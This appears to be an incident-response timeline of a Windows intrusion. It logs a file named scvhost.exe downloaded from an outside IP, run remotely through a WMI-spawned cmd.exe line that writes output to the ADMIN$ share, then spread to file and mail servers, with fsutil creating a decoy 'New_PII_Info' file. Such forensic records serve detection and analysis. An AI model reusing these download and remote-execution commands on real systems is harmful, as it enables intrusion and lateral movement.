События
scvhost.exe was created on acc-win10-1DogeDollaz.exe was created as scvhost.exe was run on site-filescvhost.exe was created on site.fileGet request sent from acc-win10-1 to download scvhost.exe from http://194.154.98.12/scvhost.exehttp://194.154.98.12/scvhost.exe was downloaded in acc-win10-1, with several 503 status code till 200On acc-win10-1, create scvhost (1).exe via
C:\Windows\system32\browser_broker.exe
-IOAVHost 2781761e-28e0-4109-99fe-b9d127c57afe
|C:\Users\lara.whitaker\AppData\Local\Packages
\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
\TempState\Downloads\scvhost (1).exe|http://194.156.98.12/scvhost.exeAgain on acc-win10-1, create scvhost (1).exe via
C:\Windows\system32\browser_broker.exe
-IOAVHost 2781761e-28e0-4109-99fe-b9d127c57afe
|C:\Users\lara.whitaker\AppData\Local\Packages
\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
\TempState\Downloads\scvhost (1).exe|http://194.156.98.12/scvhost.exeeric blair - site-file, run cmd.exe /Q /c C:\Windows\TemC:\Windows\Temp\scvhost.exe 1>
\\127.0.0.1\ADMIN$\__1674062579.3074403 2>&1
Parent process is
C:\Windows\System32\wbem\WmiPrvSE.exeDogeDollaze.exe was created in mail serverWhere: mail server
Who: site/Administrator
New_PII_Info was created via fsutil.exe file createnew New_PII_Info 1000000Where: File Server
Who: site/Administrator
New_PII_Info was created via fsutil.exe file createnew New_PII_Info 1000000Where: Mail Server
Who: site/Administrator
New_PII_Info was created via fsutil.exe file createnew New_PII_Info 1000000
Comments